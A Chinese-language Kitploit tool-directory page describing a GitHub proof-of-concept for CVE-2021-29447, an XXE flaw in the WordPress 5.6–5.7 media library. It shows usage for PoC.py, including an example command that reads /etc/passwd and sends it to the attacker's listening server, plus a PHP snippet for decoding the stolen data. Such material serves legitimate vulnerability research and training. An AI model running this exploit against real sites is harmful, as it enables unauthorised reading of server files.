Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/0xrar/cve-2021-29447-poc
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试
GitHub0xrar/cve-2021-29447-poc

CVE-2021-29447-PoC

一个用于 WordPress 5.6 媒体库漏洞的概念验证利用代码

查看仓库
613年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2021-29447 概念验证

root@kitploit:~
╔═╗╦  ╦╔═╗
║  ╚╗╔╝║╣────2021-29447
╚═╝ ╚╝ ╚═╝
Written By (Isa Ebrahim - 0xRar) on January, 2023

═══════════════════════════════════════════════════════════════════════════
[*] 标题: Wordpress 媒体库中的 XML 解析问题导致 XXE
[*] 受影响版本: Wordpress 5.6 - 5.7
[*] 已修复版本: Wordpress 5.7.1
[*] 安装版本: PHP 8
═══════════════════════════════════════════════════════════════════════════

CVE-2021-29447: 拥有上传文件权限的用户(如作者)可以利用媒体库中的 XML 解析问题发起 XXE 攻击。这要求 WordPress 安装使用 PHP 8。成功的 XXE 攻击可以访问内部文件。该漏洞已在 WordPress 版本 5.7.1 以及通过小版本更新的受影响的旧版本中得到修复。

此脚本易于理解和使用,将自动执行利用 WordPress 媒体库 XXE 攻击所需的步骤。

使用方法

root@kitploit:~
usage: PoC.py [-h] [-l LHOST] [-p PORT] [-f FILE]

options:
  -h, --help            显示此帮助信息并退出
  -l LHOST, --lhost LHOST  你的服务器 IP 地址,例如 10.0.2.15
  -p PORT, --port PORT  你的服务器端口,例如 1337
  -f FILE, --file FILE  要读取的系统文件,例如 /etc/passwd

示例:

root@kitploit:~
$ python3 PoC.py -l 10.0.2.15 -p 8000 -f /etc/passwd

要解码 base64,请使用/运行以下 PHP 代码片段:

root@kitploit:~
<?php
echo zlib_decode(base64_decode('base64_here'));
?>
root@kitploit:~
$ php decode.php

  • 参考资料:
    • https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-rv47-pc52-qrhh
    • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29447
    • https://tryhackme.com/room/wordpresscve202129447
下载工具